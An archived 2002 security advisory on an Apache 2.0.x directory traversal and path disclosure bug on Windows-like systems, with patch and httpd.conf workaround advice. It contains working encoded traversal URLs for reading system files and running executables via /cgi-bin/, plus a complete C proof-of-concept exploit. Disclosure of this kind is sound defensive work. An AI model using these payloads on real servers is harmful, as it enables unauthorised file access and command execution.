16th Aug 2002 [SBWID-5638]
COMMAND
Apache directory traversal and path disclosure bug
SYSTEMS AFFECTED
Apache version 2.0.39 and previous 2.0.x, ONLY on systems that
supportsbackslash path delimiters (Win/Netware/OS2 etc...)
PROBLEM
Auriemma Luigi [aluigi@pivx.com], Security Researcher, PivX Solutions
[http://www.PivX.com], LLC posted :
1) Introduction
The bug I have found about the directory traversal can be classified as
a high risk bug and the path disclosure as a low risk. With the first
bug an attacker can see every file in the system and execute it using
the /cgi-bin/ path. The bug was shown to the Apache Group some minutes
after it's being discovered. The bug was quickly fixed. The second bug
instead is a simple path disclosure bug, useful for obtaining more info
about the server (important if the administrator hide some information)
- IMPORTANT NOTE -
The ASF recommends all Win32, Netware and OS2 users immediately upgrade
to the 2.0.40 or, temporary, apply the fix suggested in the Fix section
of this advisory. It is also suggested that any of the un*x-flavors
also should consider upgrading to 2.0.40 to eliminate the
path-revealing bugs that apply to all versions.
2) Bug
A) CAN-2002-0654
----------------
The bug is not dangerous because it does not give remote access to the
system or other data accesses but for an attacker it is useful in
gathering detaild information about the server to launch other
malicious attacks. With this bug we can see the path where Apache is
installed, so we can know if the server run on a Windows machine, if it
is the second version of Apache (Apache2) and naturally the server
version (all of the the info is useful if the administrator has
obscured the Server field or other info about the server, so if the bug
is present, we know for example that the Apache installed is a version
prior the 2.0.40).
However let's go with the example.
From the browser we must insert the following string:
http://127.0.0.1/error/HTTP_NOT_FOUND.html.var
Then the server will answer with this page:
|Not Acceptable
|
|An appropriate representation of the requested resource /error/HTTP_NOT_FOUND.html.var could not be found on this server.
|Available variants:
|
| * C:/server/Apache Group/Apache2/error/HTTP_NOT_FOUND.html.var , type text/html, language de
| * C:/server/Apache Group/Apache2/error/HTTP_NOT_FOUND.html.var , type text/html, language en
| * C:/server/Apache Group/Apache2/error/HTTP_NOT_FOUND.html.var , type text/html, language es
| * C:/server/Apache Group/Apache2/error/HTTP_NOT_FOUND.html.var , type text/html, language fr
As we can see, the server answer with the full path of the file we have
requested. We can request all the files .var in the error folder and we
will have the same result.
More detailed info can be found on the Apache website
http://httpd.apache.org
B) CAN-2002-0661
----------------
The problem is in the management of the bad chars that can be used to
launch some attacks, such as the directory traversal. In fact the
backslash char ('' == %5c) is not checked as a bad char, so it can be
used for seeking the directories of systems that use it as a path
delimiter (Windows, Netware, OS2 and others).
Then another problem is that the attacker can execute commands on the
remote host simply using the /cgi-bin/ path.
The following are two simple examples.
for view the file winntwin.ini:
http://127.0.0.1/error/%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5cwinnt%5cwin.ini
for run the wintty utility in the Apache2/bin folder:
http://127.0.0.1/cgi-bin/%5c%2e%2e%5cbin%5cwintty.exe?%2dt+HELLO
In human readable form, they mean:
http://127.0.0.1/error/........winntwin.ini http://127.0.0.1/cgi-bin/..binwintty.exe?-t+HELLO
So in the first example we go down to the root path with ........
because we are in "c:program filesApache GroupApache2error". Instead in
the second example we use the /cgi-bin/ path and we pass arguments with
"file.exe?arg1+arg2+arg3+...".
3) The Code
Look the examples in section 2.
Update (29 August 2002)
======
/*
* DSR-apache2.0x by bob@dtors.net
* Exploit found by Auriemma Luigi.
*
* This is Proof on Concept exploit for
* the current directory traversal design flaw
* in apache 2.0.x - 2.0.39.
*
* Affected Systems:
*
* Windows [win32]
* Netware
* OS2
* Cygwin
*
* This exploit allows the attacker to view ANY
* file on the target machine if it is vulnerable
* to this attack.
*
*/
#include <stdio.h>
#include <unistd.h>
#include <string.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <netdb.h>
#define bs "%5c"
char travcode[]=
"\x25\x35\x63\x25\x32\x65\x25\x32\x65"
"\x25\x35\x63\x25\x32\x65\x25\x32\x65"
"\x25\x35\x63\x25\x32\x65\x25\x32\x65"
"\x25\x35\x63\x25\x32\x65\x25\x32\x65"
"\x25\x35\x63\x25\x32\x65\x25\x32\x65"
"\x25\x35\x63";
void reply(int sock);
void reply(int sock)
{
int n;
char recvbuf[1024];
fd_set rset;
while (1) {
FD_ZERO(&rset);
FD_SET(sock,&rset);
FD_SET(STDIN_FILENO,&rset);
select(sock+1,&rset,NULL,NULL,NULL);
if (FD_ISSET(sock,&rset)) {
if((n=read(sock,recvbuf,1024)) <= 0) {
printf("Connection closed by foreign ghost.\n");
exit(0);
}
recvbuf[n]=0;
printf("%s",recvbuf);
}
if (FD_ISSET(STDIN_FILENO,&rset)) {
if((n=read(STDIN_FILENO,recvbuf,1024)) > 0) {
recvbuf[n]=0;
//write(sock,recvbuf,n);
}
}
}
}
int main(int argc, char *argv[]) {
int sock;
char exp[1024];
struct in_addr addr;
struct sockaddr_in sin;
struct hostent *he;
fprintf(stdout, "\n\tDSR-apache2.0x.c By bob.\n");
fprintf(stdout, "Proof Of Concept Code for Apache 2.0.x 2.0.39\n");
fprintf(stdout, "\tDSR-[www.dtors.net]-DSR\n");
if(argc<4)
{
fprintf(stderr, "\nUsage : %s <host> <dir> <file>\n\n", argv[0]);
exit(1);
}
if ((he=gethostbyname(argv[1])) == NULL)
{
fprintf(stderr, "Cumon! Gimme some socks to put on!\n\n");
exit(1);
}
/* A fresh pair of clean socks ;) */
sock=socket(AF_INET, SOCK_STREAM, 0);
bcopy(he->h_addr, (char *)&sin.sin_addr, he->h_length);
sin.sin_family=AF_INET;
sin.sin_port=htons(80);
/* yummy fresh smelling */
fprintf(stdout, "Hold up bish connecting to host... \n");
if (connect(sock, (struct sockaddr*)&sin, sizeof(sin))!=0)
{
fprintf(stderr, "My socks are all sweaty.\n");
exit(1);
}
else {
/* im exhausted after that...gn */
sleep(3);
sprintf(exp, "GET /error/%s%s%s%s HTTP/1.1\r\nHost: %s\r\n\r\n" ,travcode, argv[2], bs, argv[3], argv[1]);
write(sock,exp,strlen(exp));
fprintf(stdout, "This is not going to be pritty.\nIm a lion here me ROAR!\n\n");
reply(sock);
close(sock);
exit (0);
}
}
SOLUTION
Patch
=====
Apache 2.0.40 from Apache website (http://httpd.apache.org)
Workaround
==========
However this is a simple workaround suggested by the Apache Group for
the directory traversal bug: A simple one line workaround in the
httpd.conf file will disallow the vulnerability. Prior to the first
'Alias' or 'Redirect' directive, add the following directive to the
global server configuration:
RedirectMatch 400 "\.."
-Also-
William A. Rowe, Jr. comments :
In Auriemma's the first example, a normal 'Alias' is used to bypass the
document root, (the alias-to the error docs location), and in the
second case, the 'ScriptAlias' is used, which also forces the
cgi-script handler.
In a properly secured server, the following will prevent the examples
above;
<Directory />
Options FollowSymLinks
AllowOverride None
Order deny,allow
Deny from all
</Directory>
This protection will refuse to serve any directories that are not
explicitly permitted by their own overriding <Directory > blocks. Of
course, all <Directory > blocks containing web content will require
the following lines (or similar) to permit access as desired...
Order allow,deny
Allow from all
However, ScriptAlias circumvents the Options ExecCGI, so the following
would still work in the usual configuration;
http://127.0.0.1/cgi-bin/%5c%2e%2e%5chtdocs%5cindex.html.en
which invokes htdocsindex.html.en as a script. Not useful, certainly,
but other more sinister purposes could be invented.
As a further safety precaution, using the Alias directive in lieu of
the ScriptAlias directive. The following structure will close the third
example vulnerability;
Alias /cgi-bin/ "/Path-to-Apache2/cgi-bin/"
<Directory "/Path-to-Apache2/cgi-bin/">
AllowOverride None
Options ExecCGI
Order allow,deny
Allow from all
SetHandler cgi-script
</Directory>
which only enables script execution in the given directory, and not as
a consequence of ScriptAlias translation.
Finally, it may be desirable not to use the SetHandler directive, but
instead call out each and every AddHandler cgi-script pl cgi ... and
all other permitted cgi files or file types.
A more complete report will be prepared and distributed by the Apache
HTTP project. Follow the project's guidance for all Win32, OS2, Netware
and Cygwin Apache 2.0.x servers (prior to .40), and add the:
RedirectMatch 400 "\.."
escape in the global server context (right after the global
DocumentRoot directive would the the safest place to assure it is the
first evaluated RedirectMatch directive.) Then upgrade to Apache 2.0.40
on any of those platforms.
TUCoPS is optimized to look best in Firefox® on a widescreen monitor (1440x900 or better).
Site design & layout copyright © 1986-2024 AOH
